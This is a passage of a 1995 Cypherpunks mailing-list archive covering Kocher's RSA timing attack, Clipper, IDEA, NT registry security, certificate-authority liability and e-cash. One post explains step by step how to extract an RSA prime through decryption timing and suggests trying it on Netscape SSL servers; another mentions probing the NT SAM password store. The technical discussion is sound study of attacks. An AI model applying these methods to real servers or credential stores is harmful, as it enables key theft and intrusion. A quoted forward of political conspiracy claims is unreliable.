21:56:12 1995 From: herbs at connobj.com (Herb Sutter) Date: Thu, 14 Dec 1995 13:56:12 +0800 Subject: Attacking Clipper with timing info? Message-ID: <199512140443.XAA19961@gold.interlog.com> At 20:10 12.13.1995 CST, Loren James Rittle wrote: >If it could be shown that Clipper chips require a fixed amount >of time/current to encode/decode traffic, then we could conclude >one of the following: > >(B1) The NSA knew about the issue and compensated for it. >(B2) The NSA didn't know about the issue and got lucky. > >I discount B2 as a valid option. Actually, if the answer was B1, >my respect for the NSA would creep up a notch. :-) Remember those carefully-chosen S-box numbers for DES and how, years later, how they just happened to turn out to be optimal for defending against the newly-discovered (in non-military circles) technique of differential cryptanalysis... :-) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Herb Sutter (herbs at connobj.com) Connected Object Solutions 2228 Urwin - Suite 102 voice 416-618-0184 http://www.connobj.com/ Oakville ON Canada L6L 2T2 fax 905-847-6019 From hfinney at shell.portal.com Wed Dec 13 22:02:29 1995 From: hfinney at shell.portal.com (Hal) Date: Thu, 14 Dec 1995 14:02:29 +0800 Subject: Timing attack against RSA Message-ID: <199512140116.RAA22256@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- Here is how I gather the timing attack against RSA decryption would work. This is the chosen-ciphertext attack of Paul Kocher's. You know n, the public modulus; suppose it is 512 bits. You want to know p and q, its prime factors. You know the details of the server's implementation of RSA. The server will do a decryption of the RSA message you send it, and give you some reply shortly after it is finished. You are going to send it bogus messages. Normally, most random messages will encrypt under RSA to numbers of about 512 bits, but you will send it ciphertext which is about 256 bits long. You are going to try to figure out the value of p. The server's algorithm is to take the ciphertext c, and first do: cp = c mod p cq = c mod q It will then do two modular exponentiations, mod p and mod q, and do a few more calculations, then return some result to you. The attack is to try to choose c to be about the same size as p, with the assumption being that if c is a bit less than p then c mod p will be fast since it doesn't have to do anything, while if c is somewhat larger than p then c mod p will be a little slower, since it will have to at least subtract p from c. Paul Kocher has measured this timing difference as 17 microseconds on one particular implementation. This is not going to be an easy time difference to measure. In addition to doing the c mod p step, the algorithm also does all those other things: the c mod q, the two RSA calculations, as well as whatever overhead is involved in the server's operation and the communication link. The variations due to the RSA calculations themselves will have a standard deviation of about 250 microseconds, based on Paul's numbers (higher than his reported value because two exponentiations are done, plus some other work). So this is a minimum amount of "noise" we must try to see through even if everything else is instantaneous. This might be the situation in the case of a hardwware token which is doing RSA decryptions with a secret key. The first step will be to try to determine the length of p. For this we will send in c values which are around 256 bits long. We might start with some 250 bit values and some 260 bit values, hoping that p is in that range. We do a whole lot of these, and we take the average time for them. If p is between 250 and 260 bits long, then the 260 bit values should take at least 17 microseconds more time to calculate on the average than the 250 bit values. One interesting question is how many samples we would have to take in order to detect this difference. One way to consider it is to ask, given that the samples have a standard deviation of about 250 microseconds, how many samples do we have to take to reliably estimate the mean within an accuracy of about 10 microseconds, or 1/25 of a standard deviation? According to my limited knowledge of statistics, if we want to be right about 90% or 95% of the time, we need to have sqrt(number-of-samples) * 1/25 be > 3, or number-of-samples should be about 5000. (Take this with a large grain of salt!) So we will have to do some thousands of samples in order to average out the noise and get our mean this accurate, with good confidence. Once we have done these tests, we have determined that p is between our two values. Now we can sub-divide the interval and poll with values which are, say, 255 bits long. Again, we would have to do enough polls to determine the true mean time to within about 10 microseconds. After we repeat this three or four times, we will know the bit length of p; in effect, we know its first bit. Now we can continue the divide and bracket procedure. Each time, we must poll many times with c values whose most significant bits are halfway between the two bracketing values which we know contain p. Each such sequence of about 5000 polls yields us one more bit of p. We repeat this about 250 times, and we will have p, from which we can derive q, and we have broken the RSA key. So, taking the estimate above of 5000 or so samples to get a bit of p, we will have to do about a million tests total to find p. (BTW, in Paul's implementation it took about 1/3 second to do a decryption, so you're looking at about 100 days of solid work to do the job.) This algorithm has some self-correcting features but it is not completely so. Suppose p's first bits are actually 1011. We have determined that it is between 1000 and 1100, and we want the 3rd bit. We poll with values which start with 1010, and (since with 90% accuracy we are wrong 10% of the time) we mistakenly conclude that the mean is the higher value, hence that p is less than 1010 and must start as 100X. We continue the procedure, and we will find that our new middle values are consistently less than p, so we gradually work out our estimate as 10011111... Eventually this train of 1's might persuade us that we may have made a mistake back there, so we would go back and poll again to try to verify our earlier results. (Of course, if another mistake happens during the 1's that will confuse us further...) Doing the attack across a network will be much more difficult because there will be a lot more variation in the turnaround time. This will have the effect of increasing the standard deviation far above a quarter millisecond, up by probably at least an order of magnitude if not two or more. Now we have to estimate a mean to within not 1/25, but maybe 1/1000 of a standard deviation, or worse. This would increase the total number of samples necessary from a million up to the level of billions or trillions. One final note: two cases to which we might want to apply this would be Netscape's SSL as implemented by its secure servers, and DigiCash's bank software. (I know Lucky said that DigiCash is immune to this attack, but maybe we would want to test it to see.) In either case, since we are sending a bogus 256 bit value, the data which decrypts will not be valid. In the case of SSL we will probably get an error packet or maybe a broken connection to tell us when it has finished the decryption. In the case of DigiCash, it does not need to do anything with the value it signs other than return it, so we will probably get a return packet. However, it is not valid cash. In order to convince DigiCash to send us this packet, it has to have deducted something from our account, at least a penny. If it takes a billion connections to do the attack (which I think is an underestimate, corresponding to about a 10 millisecond standard deviation on the timing values), that will cost 10 million dollars. So you better have pretty deep pockets to think about mounting this attack in that case. For SSL, misses don't cost you anything, so maybe it would be worth trying, if you have a good, low-latency connection and a server with a light load. The full attack would take too long but just determining the length of p would be quite a coup. Actually of course you would have to do some more research before mounting this attack; specifically, you'd want to know more about the timing of the software so you could estimate the costs of the mod p operation you are trying to catch. If the number ends up being much less than 17 microseconds the attack gets that much harder. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBMM961RnMLJtOy9MBAQFBgAH/WQTMSvRySqNXpfnI4kNXUKQPAleV4NUL ciaDg9VrY8OOJ0cYO8aZ+RnGn+BKp7WFbIkIKFDO3mSE/o9Be2uI7w== =ijGI -----END PGP SIGNATURE----- From jim at bilbo.suite.com Wed Dec 13 22:15:15 1995 From: jim at bilbo.suite.com (Jim Miller) Date: Thu, 14 Dec 1995 14:15:15 +0800 Subject: Attacking Clipper with timing info? Message-ID: <9512140458.AA25132@bilbo.suite.com> > >If it could be shown that Clipper chips require a fixed amount > >of time/current to encode/decode traffic, then we could conclude > >one of the following: > > > >(B1) The NSA knew about the issue and compensated for it. > > Remember those carefully-chosen S-box numbers for DES > and how, years later, how they just happened to turn out to > be optimal for defending against the newly-discovered > (in non-military circles) technique of differential > cryptanalysis... :-) > That brings up an issue I occasionally think about...At what point does NSA's secrecy become more of a liability than an asset. Should the NSA reveal flaws in crypto-systems in wide use here in the US to protect US companies and individuals from attack or should they remain quite so they can exploit them in the interests of national security? Jim_Miller at suite.com From mab at crypto.com Wed Dec 13 22:23:12 1995 From: mab at crypto.com (Matt Blaze) Date: Thu, 14 Dec 1995 14:23:12 +0800 Subject: Attacking Clipper with timing info? In-Reply-To: <9512140222.AA23036@bilbo.suite.com> Message-ID: <199512140531.AAA23535@crypto.com> > > That was indeed what I was wondering. I expect we wont have to wait too > long before we hear whether Clipper chips require the same or a different > amount of time to encrypt/decrypt. Should be interesting. > Clipper chips require fixed time to do a codebook cipher operation (exactly 64 clock ticks). It's in the chip spec. Capstone chips, on the other hand (as embodied in Tessera/Fortezza) have public-key operations (DSA and a classified key exchange algorithm called KEA that appears based on its interface to be El Gamal-like). The cards aren't supposed to reveal the secrets stored on them, ever. There does appear to be some variability in those functions, however. I've not yet reached any firm conclusions, however. -matt From jamesd at echeque.com Wed Dec 13 22:40:23 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 14 Dec 1995 14:40:23 +0800 Subject: e-Cash: CAFE vs. Mondex Message-ID: <199512140600.WAA26003@blob.best.net> At 11:34 AM 12/12/95 +0100, Matthias Schunter wrote: > We will soon publish our full protocol and architecture specifications. > A short 50-page summary is already available (PostScript). While I appreciate all the good work you guys are doing, it is often said that when people wish to nominally make things public without the risk of too many people paying attention, they make a postscript file, and when they really want the world to know, they make a bunch of html files. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From liberty at gate.net Wed Dec 13 23:14:54 1995 From: liberty at gate.net (Jim Ray) Date: Thu, 14 Dec 1995 15:14:54 +0800 Subject: 3rd party beneficiaries and certificates Message-ID: <199512140518.AAA30556@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Dear cypherpunks: Professor Froomkin posted the following interesting questions to cyberia-L, and gave me permission to repost them here. Please direct any private replies to him . My apologies to those of you who hang out in both dens for having to see the same message twice. JMR [Forwarded message follows] I've been trying to work something out. (I've written these questions in the form of an exam because it's that time of year. In fact, I'm struggling with these in a paper I'm working on.) Carol runs a certificate authority (CA). She sells a certificate to Alice binding Alice's public key to her name and email address. In version (A) of the contract Carol posts the certificate on her web site. In version (B) of the contract Alice gets a floppy disk with the certificate. The certificate is in error (due to Alice's fraudulent or negligent misrepresentation to Carol). Bob relies on it to his detriment in a transaction with Alice. Assume Bob can show but for causation of his loss. Bob now wishes to sue Carol for negligent misrepresentation. He has, I think, three possible theories. 1) UCC. This turns on whether a certificate is a "good" or a "service". {Assume the answer is "service" for the rest of this hypo} 2) Contract. Bob has to show that he's an intended beneficiary under the restatement 2d test. This seems to be almost a theological question. Is the purpose of the certificate to give Alice a tool to induce Bob to transact, or to give Bob a benefit without which he will not transact? 3 )Tort of negligent misrepresentation. To make this especially exciting, let's assume all the action is in NY where the shadow of Cardozo still looms. NY retains a strong privity rule: You can only recover for a negligent misrepresentation if you are in privity of contract with the speaker. Question 1: If Bob is an intended beneficiary, is he in privity with Carol? (I think the answer is "yes"). Question 2: Are Bob's rights, or his status as an intended beneficiary, affected by whether the contract is form A or form B above? The classic cases, like Ultramares have the accountant's report spread around by the client. Suppose the accountant in Ultramares instead publishes the report on the Web -- what result? OK, now we change the facts. We're not in NY anymore, we are in a state that follows the restatement 2d rule in sec. 552. Question 3: Is Bob within the class of forseeable users entitled to recover for the tort of negligent misrepresentation as these terms are used in the restatement? Question 4: Is the certificate a good or a service? (I say it's a service, mostly, unless it makes no representations at all about its quality.) Extra credit: Look up http://www.verisign.com/netscape/legal.html and find the disclaimers in THE BIG TYPE. Do you know of any court that would enforce these? On a "good"? On a "service" provider? A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. [End forwarded message] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMM+jfW1lp8bpvW01AQFe7QP/dlWbaICoo7lgtTZVsZvd4dvKx3LawfU9 FH8e78Tpo5ICgfKwBNNj6MlBgG7sxAu2LTqMHTTHkcuHksdNTZImJlnNs64phnK0 zBF7IqcT1BOBijWiFWdni+i62NGzppj0BKnyebmFivUbwmi4QGN3gLMxkvD94eWI TU7/+tFB/iI= =8JOv -----END PGP SIGNATURE----- From stewarts at ix.netcom.com Thu Dec 14 00:25:33 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 14 Dec 1995 16:25:33 +0800 Subject: e-mail forwarding, for-pay remailers Message-ID: <199512140742.XAA06927@ix13.ix.netcom.com> >E. Allen Smith writes: >> There's one problem with this in regards to the "no necessary >> connection," and that 's the governmental requirement for mail >> forwarding. MBE and any legal other one will want to see at least >> two forms of ID including one photo, and have a form that they fill >> out using that and send to the local post office. Anyone have a >> way around this problem? There are two different sets of relevant rules in the US - Post Office and state. The PO's primary interest is making sure you don't mind if they don't forward your mail once you stop using the Commercial Mail Receiving Agent (CMRA) and secondarily that you aren't committing fraud by using the mailbox, sending people change-of-address notices, ripping off your creditors, and skipping town. California has a hopelessly dishonest law that just went into effect in 1995, which pretends to be designed to protect consumers from fraud by the 7 million small businesses in CA that uses mailboxes, and actually requires that _anybody_, business or not, who wants to rent a mailbox must fill out the Post Office form and also appoint the PO or CMRA as their agent for service of process and give them up-to-date True Addresses. The PO, meanwhile, "usually wants" a California Driver's License plus another ID to rent a box from them. (I didn't have such a thing when I last rented a box, and the PO hassled my mailbox company into asking for one when the new law came out.) After many attempts at calling the PO to get anybody who knows the _official_ rules for what ID is required, I found a PO lawyer who told me the rules are in the "Domestic Mail Manual", which any Postmaster has, so my next step is to look up one of those before I next get a mailbox. So maybe a random photo ID will work, such as your FooBar Consulting Employee ID, and maybe it won't, depending on what state you live in and how clueless your local Post Office bureaucrats are. At 05:29 PM 12/13/95 -0600, Andrew Loewenstern wrote: > I believe C2.org already offers non-dialup access accounts, paid for >with ECash, that do not require a valid snail-address or phone-number. >I am sure that there will be many more to come. I suspect Sameer would be happy to open an account paid in advance in small unmarked bills. AOL probably wouldn't. Fortunately, the government hasn't really caught on to the importance of email, so they aren't requiring that email providers know where you really live. I predict 1997 for that. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From futplex at pseudonym.com Thu Dec 14 01:06:49 1995 From: futplex at pseudonym.com (Futplex) Date: Thu, 14 Dec 1995 17:06:49 +0800 Subject: The Elevator Problem In-Reply-To: <199512121533.JAA21358@cdale1.midwest.net> Message-ID: <199512140825.DAA19241@opine.cs.umass.edu> Dave writes: > Disregarding the "quantum properties of light" issue, if Eve can listen > in on every communication between Alice and Bob about their keys, then > doesn't she have enough information to reconstruct the key herself? By "disregarding the quantum properties", I assume you are asking about deterministic cryptosystems. Eve does not have sufficient information if Alice and Bob use, say, Diffie-Hellman key exchange (DH). As I said, that's why DH is so clever. :) (cf. any good crypto text) But that's patented (for now), and we were asked about a patent-free solution. -Futplex "We live in a time when...individual rights are constantly expanded" -Sen. Orrin Hatch (R-UT), speaking in support of an anti-flag-desecration Constitutional amendment From ecarp at netcom.com Thu Dec 14 01:40:38 1995 From: ecarp at netcom.com (Ed Carp (ecarp@netcom.com)) Date: Thu, 14 Dec 1995 17:40:38 +0800 Subject: Jim Quinn interview of James Norman (edited) Message-ID: <199512130722.BAA23513@khijol> > To: ecarp at netcom.com > Cc: cypherpunks at toad.com > Subject: Re: Jim Quinn interview of James Norman (edited) > Reply-to: perry at piermont.com > Date: Tue, 12 Dec 1995 14:53:14 -0500 > From: "Perry E. Metzger" > > According to the headers, you, Mr. Carp, forwarded this to > Cypherpunks, when it was obviously available to those that wanted to > read it on a variety of other mailing lists. > > Please don't continue doing this. > > Jon Roland writes: > > The following is a Radio Interview between James Norman, > > formerly Senior Editor of Forbes Magazine and now with Media > > Bypass Magazine and Jim Quinn, DJ of WRRK 96.9 FM in Pittsburgh. > > In this interview from December 7th, they discuss issues of > > national importance and STUNNING IMPACT. Essentially they give > > out the reason for Vincent Foster's Death, and the fact that > > the "resignations" of the Congresspersons are NOT for policy > > reasons but because they have been caught with millions in > > corrupt funds in Swiss Banks. Read this to learn what the > > "mainstream media" doesn't ever tell you... Unfortunately, even I sometimes hit the wrong button on my mailer. From ncognito at gate.net Thu Dec 14 01:42:51 1995 From: ncognito at gate.net (Ben Holiday) Date: Thu, 14 Dec 1995 17:42:51 +0800 Subject: IDEA encryption In-Reply-To: <199512130237.VAA21019@charon.MIT.EDU> Message-ID: On Tue, 12 Dec 1995, Derek Atkins wrote: > > The copy of the source for idea (unix) that I have specify's a user key > > length of 8 bytes, but allows this to be increased to something larger. > > Will increasing the user keylength improve the overall security? > > Umm, I think you are confused. First, IDEA has a keysize of 16 bytes, > not 8. Second, it cannot be easily changed. Sure, your code probably /******************************************************************************/ /* */ /* I N T E R N A T I O N A L D A T A E N C R Y P T I O N A L G O R I T H M */ /* */ /******************************************************************************/ /* Author: Richard De Moliner (demoliner at isi.ee.ethz.ch) */ /* Signal and Information Processing Laboratory */ /* Swiss Federal Institute of Technology */ /* CH-8092 Zuerich, Switzerland */ /* Created: April 23, 1992 */ /* Changes: November 16, 1993 (support of ANSI-C and C++) */ /* System: SUN SPARCstation, SUN acc ANSI-C-Compiler, SUN-OS 4.1.3 */ /******************************************************************************/ /* Change this type definitions to the representations in your computer. */ [snipped irrelivant bits] /******************************************************************************/ /* It is possible to change this values. */ #define Idea_nofRound 8 /* number of rounds */ #define Idea_userKeyLen 8 /* user key length (8 or larger) */ /******************************************************************************/ /* Do not change the lines below. */ #define Idea_dataLen 4 /* plain-/ciphertext block length*/ #define Idea_keyLen (Idea_nofRound * 6 + 4) /* en-/decryption key length */ #define Idea_dataSize (Idea_dataLen * 2) /* 8 bytes = 64 bits */ #define Idea_userKeySize (Idea_userKeyLen * 2) /* 16 bytes = 128 bits */ [end cut out] So what im reading here is; A) it is possible to change the value of the userkeylength, and B) the actual key is (2 * userkeylen) or in the case of an 8byte key, 2 * 8bytes = 16 bytes = 128bits. Maybe im crazy. From kinney at bogart.Colorado.EDU Thu Dec 14 01:43:36 1995 From: kinney at bogart.Colorado.EDU (W. Kinney) Date: Thu, 14 Dec 1995 17:43:36 +0800 Subject: CryptoLib 1.0 now available In-Reply-To: <199512140032.TAA27224@nsa.tempo.att.com> Message-ID: <199512140448.VAA18190@bogart.Colorado.EDU> > CryptoLib includes the following: [...] > quantization (Defense against Kocher's timing attack) > quantized RSA, DSA and El Gamal private key operations. Maybe this is an incorrect conclusion, but here seems to be a _second_ group who knew about Kocher's timing attack before Kocher did. What on earth would ECash or ATT have to gain by keeping such knowledge a secret? -- Will From futplex at pseudonym.com Thu Dec 14 02:46:29 1995 From: futplex at pseudonym.com (Futplex) Date: Thu, 14 Dec 1995 18:46:29 +0800 Subject: The Elevator Problem In-Reply-To: <199512130413.XAA04532@pipe4.nyc.pipeline.com> Message-ID: <199512140944.EAA18499@opine.cs.umass.edu> tallpaul writes: > Alice says to Bob, in front of all of the other people on the elevator: "I > have generated a large(ish) amount of large(ish) prime numbers and have > recorded all of them. I have multipled two of the numbers to get an even > larger non-prime number. I have done this a large(ish) number of times > until I have a 'large(ish)/2' set of non-prime numbers. The elements of > this set are [Alice reads off the set of non-prime numbers and Bob along > with the other people on the elevator record them.] Bob, go home and pick > one of the non-prime numbers in the set. Factor it. Use the largest prime > as a private key in your message to me. Since I know what the numbers all > are, I'll try all of them to see which one decrypts your message." > > Bob has to factor one large(ish) prime. > > Alice has to *try* an average of "large(ish)/2" private keys to decrypt > Bob's message. > > The other people on the elevator have to *factor* an average of > "large(ish)/2/2" number of large(ish) numbers to decrypt the message. > > The *relative* security then depends on the number of digits in the > large(ish) primes and the number of products in the set Alice reads to Bob. > [...example with a set of 2 * 10^6 primes...elided] I think there are two main (related) problems with this protocol: (1) It does not offer great security. The time required for a brute force attack is only linear in the time required to execute the protocol. So Alice will want to start out with an enormous number of primes (the linear factor). Even so, the attacker's job is relatively easy. (2) It is rather impractical. The time required to execute the protocol is prohibitive (assuming Alice uses a huge number of primes). Consider the numbers in your example. Alice generates N = 2*10^6 large primes and transmits the 10^6 pair products -- that's on the order of .1 gigabits, or about 12 megabytes, to transmit (assuming products around 100 bits long, so Bob can factor one before the heat death of the universe). Bob factors one of the products, which should take a while for all this to be at all worthwhile. Let's say it takes Bob approximately an hour to factor. This will take too long to do online. Alice and Bob won't generate new keys for each session this way. But to limit the chance that Eve can start to decrypt their communications in real time to 10%, if Eve has 100 times the computing power of Bob, they'll need to negotiate a new key every 6 weeks or so. This is not so hot. Comments ? -Futplex From a.brown at nexor.co.uk Thu Dec 14 02:51:15 1995 From: a.brown at nexor.co.uk (Andy Brown) Date: Thu, 14 Dec 1995 18:51:15 +0800 Subject: NT Password Security Update. Registry values changed! In-Reply-To: <9512131601.AA04595@toad.com> Message-ID: <30CFF261.6AE8@nexor.co.uk> Peter Trei wrote: > Andy, do you have Administrator privs on your NT system? I too seem > to have full access to all registry entries, including all under Security. Whoops, it seems that I had auto-refresh switched off in regedt32 so I didn't see the immediate effect of my changes. Yes I can see them now, time to investigate the SAM subkey I think. Regards, - Andy From marina at commtouch.co.il Thu Dec 14 03:24:45 1995 From: marina at commtouch.co.il (marina kats) Date: Thu, 14 Dec 1995 19:24:45 +0800 Subject: PGP Interoperability? Message-ID: <9512141007.AA00523@commtouch.co.il> Can anyone out there vouch for the interoperability of PGP 2.6 ui with versions of PGP available in USA from MIT & Viacrypt. What about the legal issue ? Is it legal for a US citizen to encrypt or check signatures with a 2.6ui public key ? Would sending a public key out of the US be reagarded as export by ITAR? Thanks Geoff Klein. From futplex at pseudonym.com Thu Dec 14 03:37:32 1995 From: futplex at pseudonym.com (Futplex) Date: Thu, 14 Dec 1995 19:37:32 +0800 Subject: PGP Interoperability? In-Reply-To: <9512141007.AA00520@commtouch.co.il> Message-ID: <199512141052.FAA19291@opine.cs.umass.edu> You should ask these questions somewhere like alt.security.pgp, if anywhere. I'll give a two bit answer ;) Geoff Klein writes: > Is it legal for a US citizen to encrypt or check signatures with a 2.6ui > public key ? Yes. > Would sending a public key out of the US be reagarded as export by ITAR? No (that is, the ITAR place no restrictions on such actions). -Futplex From a.brown at nexor.co.uk Thu Dec 14 03:49:21 1995 From: a.brown at nexor.co.uk (Andy Brown) Date: Thu, 14 Dec 1995 19:49:21 +0800 Subject: NT Password Security Update. Registry values changed! In-Reply-To: <2.2b7.32.19951213071131.00316644@netcom14.netcom.com> Message-ID: <30CE9F76.23C7@nexor.co.uk> Ted Cabeen wrote: > Well, I did some more research into the NT password security issue and I > discovered that I can get access to the Security section of the registry How did you do that? The SECURITY section is always greyed out and the operating system will not allow you to change the permissions on it. If you did indeed gain access to that area then you've probably found a flaw in the tamperproof capabilities of NT. - Andy From awestrop at nyx10.cs.du.edu Thu Dec 14 04:59:11 1995 From: awestrop at nyx10.cs.du.edu (Alan Westrope) Date: Thu, 14 Dec 1995 20:59:11 +0800 Subject: Denver area meeting, SUNDAY, 12/17, 2 pm Message-ID: -----BEGIN PGP SIGNED MESSAGE----- As usual, we'll begin at the Tivoli, near the downtown Auraria campus (send email for directions). Weather permitting, we'll have Yet Another Demonstration of the Peripatetic Cypherpunks Protocol (patent pending), visiting Lower Downtown's restaurants, saloons, libraries, the Tattered Cover Bookstore, whatever... Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNAUk1RRFMq4NZY5AQEKiAQAjihODhe8tuPqAf47XMX4kKgsSLpaQkAd 922Ve0MkZB3X1nCDu1Yqf7tavfND+3ORhaFUiu3ZV0WqEBFpYazV9DpFccM81d6S 4dKFhi60CkF8pX5snn87MAkn7vKg0wkGFBTprHe1z+z2u61Y5dFutRwXMchgZTK0 4oFnhsXyVcc= =umSa -----END PGP SIGNATURE----- From Alan.Pugh at internetMCI.COM Thu Dec 14 06:12:19 1995 From: Alan.Pugh at internetMCI.COM (amp) Date: Thu, 14 Dec 1995 22:12:19 +0800 Subject: Netscape announces position against GAK Message-ID: <01HYSHEGJFMA94GEQ2@MAIL-CLUSTER.PCY.MCI.NET> -- [ From: amp * EMC.Ver #2.3 ] -- -----BEGIN PGP SIGNED MESSAGE----- TM> I for one am satisfied--and even pleased--with the Netscape TM> position on GAK. TM> It remains to be seen how steadfast Netscape, as the major player in TM> the Web browser business, remains in the face of (likely) pressure TM> from the government. i'm not entirely satisfied with netscape's response, but then, i didn't expect to be. i _expect_ weasling from corporations that have made the 'big time'. this is the way life is i suppose. what i'd like to see would be more companies that have an interest in the security of net-based transations in their best interest, (which would be any company that intends to do any business on the net) come out _forcefully_ for strong crypto. the ability of hackers to penetrate the computers of the net would be greatly curtailed by universal crypto. is there not a strong national interest in the integrity of the net in general and financial interactions in particular? looking forward, which politicians and bureaucrats are loathe to do, commerce and corporate dealings across the net will only increase. what we need to do is get large corporations to recognise that privacy is important to _them_. of course, many already know that privacy is important to them. why else would we have a body of law concerning "trade secrets"? i work for a fairly large corporation. this makes finding who to talk to about this difficult. i'm working on it though. perhaps some of you out there can consider ways to convince those in positions of authority in your company to realize that crypto technology works toward their own best interest. they _must_ speak to this because it is business that runs this world of ours. TM> It seems to me that we have have been quick to criticize TM> Netscape--which is good, the quickness part--and thus we should be TM> equally quick to praise them. To be sure, various of us might've TM> written the Netscape position statement slightly differently, but TM> this does not change the basic point: that Netscape has come out TM> against the Administration's position on GAK. TM> For this they deserve our praise. indeed. netscape deserves praise for including 128-bit encryption in their products in the first place. while i'd like to see them stand up and tell big brother to fuck off and die, i am appreciative of what they've done so far. i'd like to see a representative of netscape on nightline or the noghtly news hold up a floppy and say "this floppy contains an encryption program that the u.s. government will not let us export. it was downloaded from the internet for free by an executive of a multinational corporation based in germany who wanted to know why i couldn't sell him a program that was as cryptologically secure as it is. my answer was that the u.s. government will not let me." similar demonstrations of the lunacy of itar are left to your imagination. ============================ these views are my own. no one else in their right mind would hold them. amp <0003701548 at mcimail.com> (since 10/31/88) Current PGP Key = 57957C9D December 13, 1995 18:51 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMM9nH4dTfgZXlXydAQGeKgf/XV2sAD7aklD+QfmcSUWReaH5jviADbMV /wIv6JW4iSOytOa36K5VEXCuep6AUQTIiEflZ4OPU4IXAOKkF3UAxJWoSFY/zT9w Kgb16I7tjDHohbc3tFikZ3z1Do3vLScxG7ll3CQOfTIr2KIxyN2/XOYkP1fsdvHr TyBAO4S/ERq1v3BKZJQ1+LskBvPhjtivWs3xU+TBxT9Fc8Op6GmvFyRgjmwMoRfQ orloUJuLbWWolnFvJMqyAK6pT5+QXZ3eH9ZguGmaLSHS8549Ts+LCirnBxI3HqZ4 sfD9jNRb3HiIG0gowXKU4lWTD4hiV+Se63NKfQYtj+qRfZ1wK+vd5A== =6FyB -----END PGP SIGNATURE----- From ljo at ausys.se Thu Dec 14 07:38:59 1995 From: ljo at ausys.se (Johansson Lars) Date: Thu, 14 Dec 1995 23:38:59 +0800 Subject: Timing Cryptanalysis Attack Message-ID: <95Dec14.153934gmt+0100.53765@void.ausys.se> Armadillo Remailer (remailer at armadillo.com) wrote: >Simon Spero writes: > >>My gut & scribble-on-the-back-of-a-napkin feeling about this class of >>attack is that it could be a problem for smartcards (almost certainly) > >Is it a problem to create smartcards that do their calculations in >fixed time? I'd guess it should be easier than on multi-purpose >hardware. > >Does the attack work for existing smartcards? At first glance, smart cards would seem to be the most critical target to Kocher's timing attack since they usually operate in on-line environments. However, all RSA smart cards I'm aware of stores the result of the RSA computation (be it decryption, signing or authentication) internally and it can only be read using a Get_Response command. Of course this may not be satisfying since the terminal could get a (noisy) measure of the time by repeatingly use this command to see when the result is available. Most smart cards does nevertheless require that the user must first specify a PIN code before the RSA algorithms are operationable. This implies that even if the card gets stolen can't it be attacked with Kocher's method. /Lars Johansson ljo at ausys.se From rschlafly at attmail.com Thu Dec 14 07:41:17 1995 From: rschlafly at attmail.com (Roger Schlafly) Date: Thu, 14 Dec 1995 23:41:17 +0800 Subject: Kocher's RSA attack Message-ID: I read Kocher's paper, but I question its applicability. One of his premises is that the time of a modular multiplication varies with the data. I've checked my code for modular multiplication, and the clock cycles to execute don't depend on the data at all. The same instructions get executed, and assuming the processor has a hardware multiply, they take the same time. When I timed the modular multiplication, I was able to detect some slight variation, but I attribute this to cache misses, as the variance with the same data was the same as the variance with different data. Apparently RSAREF has modular multiplies which vary significantly with the data, but I maintain this is not necessary. A good test case for his analysis might be to pull a secret key from a smart card. If, say, the Capstone chip modular multiplication has some timing anomalies, this might be a good way to defeat the Fortezza card. Roger Schlafly From darrell at teleport.com Thu Dec 14 07:42:59 1995 From: darrell at teleport.com (Darrell Fuhriman) Date: Thu, 14 Dec 1995 23:42:59 +0800 Subject: And the standard continues to lower... In-Reply-To: <199512140038.BAA02939@utopia.hacktic.nl> Message-ID: > >http://www.bluewaterp.com/~bcrissey/ Oh no.. It's not... # nslookup www.bluewaterp.com Server: sandra.teleport.com Address: 192.108.254.11 Name: www.teleport.com Addresses: 192.108.254.16, 192.108.254.17, 192.108.254.18 Aliases: www.bluewaterp.com Ack! it is!! Oh no.. > The scheme is to send 4 digits of the credit card at a time. The > "explanation" follows. I've had a little chat with the web people downstairs about this. I don't know what they were thinking when they have this guy permission to run this.. I thought about sticking a packet sniffer on the network, and sending him all his "secure" transactions. I'm going to look over the code for obvious problems (heh heh that's an understatement), but a cursory glance leads me to think it's an entry in the Annual Poor Code Formatting contest. Ugh.. I'm so embarrased. Darrell Fuhriman Teleport System Administration From ljanke at direct.ca Thu Dec 14 08:19:12 1995 From: ljanke at direct.ca (ljanke at direct.ca) Date: Fri, 15 Dec 1995 00:19:12 +0800 Subject: Authenication and CIRC Message-ID: <199512130722.XAA00259@clouds.heaven.org> Does anyone know of versions of CIRC which support authenication? The version I pulled off csua does not even for the initial 3DES key exchange. From stewarts at ix.netcom.com Thu Dec 14 08:21:58 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 15 Dec 1995 00:21:58 +0800 Subject: Timing RSA and Certificates worth ?? Message-ID: <199512130721.XAA21701@ix7.ix.netcom.com> At 12:50 PM 12/13/95 +1100, lyalc at mail.mpx.com.au (lyal collins) wrote: >I meant that on-line certificate issuing, notary and similar services where >data is submitted to a system for processing/RSA encryption are subject to >this for of attack. >Parts of the SEPP/STT protocols appear to require this of merchants and >customers. >I retract my comments about ecash/echeques - I'm not sure of the >implications there yet. >As for SEPP/STT - another nail in the coffin, me thinks. For large environments like this, it's possible to work around the attack by methods like queueing up all the signature jobs and doing them serially; this makes it difficult for the Bad Guy to know whether the server is taking time doing his multiplications or Alice's or N other customers', so he can't control timing very well by picking otherwise-informative numbers. On the other 